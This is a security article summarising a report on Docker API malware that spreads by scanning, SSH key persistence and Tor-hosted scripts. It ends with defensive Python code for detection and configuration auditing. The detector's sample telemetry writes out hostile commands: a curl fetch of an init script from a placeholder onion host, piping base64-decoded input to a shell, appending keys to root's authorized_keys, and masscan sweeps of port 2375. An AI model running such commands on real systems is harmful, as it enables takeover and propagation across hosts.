The Akamai Hunt Team has discovered a new strain of malware targeting exposed Docker APIs. Unlike earlier versions focused on cryptomining, this variant introduces expanded infection capabilities, including persistence mechanisms, port blocking, and potential groundwork for a distributed botnet.
The malware first came to light in June 2025, when Trend Micro reported a strain that exploited misconfigured Docker APIs to deploy a cryptominer hidden behind Tor. Attackers executed Base64-encoded payloads within new containers, modified SSH configurations for persistence, and installed tools like masscan and torsocks before launching an XMRig miner.
But by August 2025, Akamai researchers observed a new variant with a shift in strategy. As they explain, “The binary is also different; the variant discovered by Akamai Hunt doesn’t drop a cryptominer but instead drops a file containing other previously used tools along with infection capabilities beyond those of the original strain.”
The new strain executes through an HTTP request to Docker APIs that launches a container based on the Alpine image. Within it, a Base64-decoded script prepares the environment, installs Tor, and retrieves a docker-init.sh script from a Tor hidden service.
Akamai notes: “This script has two stages: Stage 1 prepares the environment by installing curl and Tor; Stage 2 fetches docker-init.sh from a Tor domain.”
The script modifies /root/.ssh/authorized_keys to add the attacker’s public key, establishes persistence with cron jobs, and installs scanning utilities. Most notably, it blocks port 2375 (Docker API) on the host, denying other attackers access — effectively “owning” the victim system for exclusive use.
The downloaded Go-based binary (dubbed dockerd) drops additional tools and runs masscan to search for other Docker instances with exposed APIs. If found, it repeats the infection cycle, propagating the malware across new hosts.
Interestingly, the binary also contains dormant modules for Telnet (port 23) and Chromium remote debugging (port 9222). While these routines aren’t yet active, they hint at future expansion. “Some of the underlying mechanisms lead us to believe this variant is an initial version of a complex botnet, but we have not found a complete version of it so far,” the Hunt Team warns.
The Telnet module uses default router credentials to gain access, sending successful logins to a remote webhook. If the login uses root, the malware assumes it has hit a honeypot — a clever counter-surveillance measure.
Meanwhile, the Chromium module leverages the chromedp Go library to attach to exposed debugging ports. While Akamai did not observe advanced exploitation here, the technique could be expanded to steal cookies, hijack sessions, or exfiltrate sensitive browser data.
The Akamai Hunt Team highlights several detection strategies:
- Monitor for containers that immediately install packages (apt, yum) and fetch scripts via curl or wget.
- Watch for new connections to ports 2375, 23, and 9222, as well as scanning activity with masscan.
- Track Base64-encoded commands executed inside Docker containers.
- Check for suspicious crontab modifications or new SSH keys under /root/.ssh/authorized_keys.
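The four detection strategies above can be expressed as rules over container telemetry. The following is an added example (not code from the report or from Akamai) that runs those rules over a small, constructed set of sample events in a made-up sensor format: `start`, `exec` (a process launched in the container) and `connect` (an outbound TCP connection). The container ids, timestamps, `PLACEHOLDER.onion` URL and the exact package and command lines are all constructed for illustration; the 60-second window that counts as "immediately" after container start is an assumption, not a value from the report.

```python
import base64
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not a real Docker or Akamai log format):
#   <timestamp> <container-id> <event> <detail>
# "start" is the container launch, "exec" a process started inside it and
# "connect" an outbound TCP connection. Container ids and URLs are invented.
SAMPLE_EVENTS = """\
2025-08-14T10:00:00Z c0ffee01 start image=alpine:latest
2025-08-14T10:00:03Z c0ffee01 exec apk add curl tor torsocks
2025-08-14T10:00:09Z c0ffee01 exec sh -c "echo aXAgbGluayBzaG93 | base64 -d | sh"
2025-08-14T10:00:12Z c0ffee01 exec curl -s http://PLACEHOLDER.onion/docker-init.sh -o /tmp/docker-init.sh
2025-08-14T10:00:20Z c0ffee01 exec sh -c "echo ssh-ed25519 AAAA... >> /root/.ssh/authorized_keys"
2025-08-14T10:00:21Z c0ffee01 exec crontab /tmp/job
2025-08-14T10:00:30Z c0ffee01 exec masscan 0.0.0.0/0 -p2375 --rate 10000
2025-08-14T10:00:31Z c0ffee01 connect dst=203.0.113.7:2375
2025-08-14T10:00:32Z c0ffee01 connect dst=203.0.113.8:9222
2025-08-14T11:30:00Z deadbeef start image=nginx:1.27
2025-08-14T11:30:45Z deadbeef exec nginx -g "daemon off;"
2025-08-14T11:31:00Z deadbeef connect dst=198.51.100.5:443
"""

# Rule parameters. The 60 s "early" window is an assumed threshold; the ports
# and tool names come from the report's detection guidance.
EARLY_WINDOW = timedelta(seconds=60)
WATCHED_PORTS = {2375: "docker-api", 23: "telnet", 9222: "chromium-debug"}
PKG_INSTALL = re.compile(r"\b(apk\s+add|apt(?:-get)?\s+install|yum\s+install)\b")
# curl/wget only count as a fetch when they are the command itself, not an
# argument to a package manager ("apk add curl").
FETCH = re.compile(r'(?:^|[;|&]\s*|"\s*)(curl|wget)\b')
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|--decode)\b")
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
SSH_KEYS = re.compile(r"/root/\.ssh/authorized_keys")
CRON = re.compile(r"\bcrontab\b|/etc/cron")
SCANNER = re.compile(r"\bmasscan\b")
CONNECT = re.compile(r"dst=(\S+):(\d+)$")


def parse_events(text):
    """Turn the sample telemetry into dicts; skips blank or malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) != 4:
            continue
        ts, cid, kind, detail = parts
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "container": cid, "kind": kind, "detail": detail})
    return events


def decode_base64_tokens(text):
    """Return printable ASCII decodings of base64-looking tokens in a command line."""
    found = []
    for m in B64_TOKEN.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if decoded.isprintable():
            found.append(decoded)
    return found


def analyze(text):
    """Apply the detection rules; returns one finding dict per hit."""
    findings = []
    started = {}                                    # container id -> start time
    for ev in parse_events(text):
        cid, detail = ev["container"], ev["detail"]

        def hit(rule, note=detail):
            findings.append({"container": cid, "rule": rule, "ts": ev["ts"], "note": note})

        if ev["kind"] == "start":
            started[cid] = ev["ts"]
        elif ev["kind"] == "exec":
            early = cid in started and ev["ts"] - started[cid] <= EARLY_WINDOW
            if early and PKG_INSTALL.search(detail):
                hit("early_package_install")
            if early and FETCH.search(detail):
                hit("early_script_fetch")
            decoded = decode_base64_tokens(detail)
            if B64_DECODE.search(detail) or decoded:
                hit("base64_command", "; ".join(decoded) or detail)
            if SSH_KEYS.search(detail):
                hit("authorized_keys_modified")
            if CRON.search(detail):
                hit("crontab_modified")
            if SCANNER.search(detail):
                hit("masscan_execution")
        elif ev["kind"] == "connect":
            m = CONNECT.search(detail)
            if m and int(m.group(2)) in WATCHED_PORTS:
                hit("watched_port_" + WATCHED_PORTS[int(m.group(2))])
    return findings


def rules_by_container(findings):
    """Collapse findings to {container: sorted list of distinct rule names}."""
    out = {}
    for f in findings:
        out.setdefault(f["container"], set()).add(f["rule"])
    return {cid: sorted(rules) for cid, rules in out.items()}


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['ts']:%H:%M:%S} {f['container']} {f['rule']:<28} {f['note']}")
```

Run stand-alone, the script flags every rule for the constructed `c0ffee01` container (including the decoded content of the Base64 token, so an analyst sees the actual command rather than the blob) and nothing for the benign `deadbeef` web container. In a real deployment the event source would be a runtime sensor or the Docker daemon's own audit trail; the rules stay the same.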
For prevention, the report advises strict network segmentation, limiting Docker API exposure, restricting Chrome debugger ports to trusted IPs, and enforcing strong password rotation on all devices.
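"Limiting Docker API exposure" comes down to how the daemon's `hosts` setting is configured. As an added example (not from the report, and not Docker's own tooling), the script below audits a `daemon.json` for the pattern the campaign relies on: a TCP listener on every interface with no TLS client verification. The two configurations are constructed; the `hosts`, `tlsverify`, `tlscacert`, `tlscert` and `tlskey` keys are real Docker daemon options, and the certificate paths are placeholders.

```python
import json
from urllib.parse import urlsplit

# Constructed /etc/docker/daemon.json contents (illustrative, not from the report).
# The weak form is the exposure the campaign scans for: plaintext API on 0.0.0.0:2375.
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

# Hardened form: remote access only over the loopback interface on the TLS
# port, and client certificates required. Certificate paths are placeholders.
HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/certs/ca.pem",
  "tlscert": "/etc/docker/certs/server-cert.pem",
  "tlskey": "/etc/docker/certs/server-key.pem"
}
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
WILDCARD = {"", "0.0.0.0", "::"}
TLS_MATERIAL = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(text):
    """Return a list of human-readable findings; an empty list means no issue found."""
    cfg = json.loads(text)
    findings = []
    tls_verify = cfg.get("tlsverify") is True

    for entry in cfg.get("hosts", []):
        url = urlsplit(entry)
        if url.scheme != "tcp":          # unix:// and fd:// sockets are local-only
            continue
        host = url.hostname or ""
        if host in WILDCARD:
            findings.append(f"{entry}: API bound to all interfaces")
        if host not in LOOPBACK and not tls_verify:
            findings.append(f"{entry}: TCP listener without tlsverify "
                            "(anyone who can reach the port controls the host)")
        if url.port == 2375:
            findings.append(f"{entry}: conventional plaintext port 2375")

    if tls_verify:
        for key in TLS_MATERIAL:
            if key not in cfg:
                findings.append(f"tlsverify is set but {key} is missing")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"[{label}]")
        for finding in audit_daemon_config(cfg) or ["no findings"]:
            print("  -", finding)
```

The check is deliberately conservative: a non-loopback TCP listener is only accepted when `tlsverify` is on and all three certificate paths are present, because `tls` alone encrypts the channel without authenticating the client. Network segmentation and firewall rules on port 2375 are still needed for hosts that must expose the API remotely; the audit only covers the daemon's own configuration.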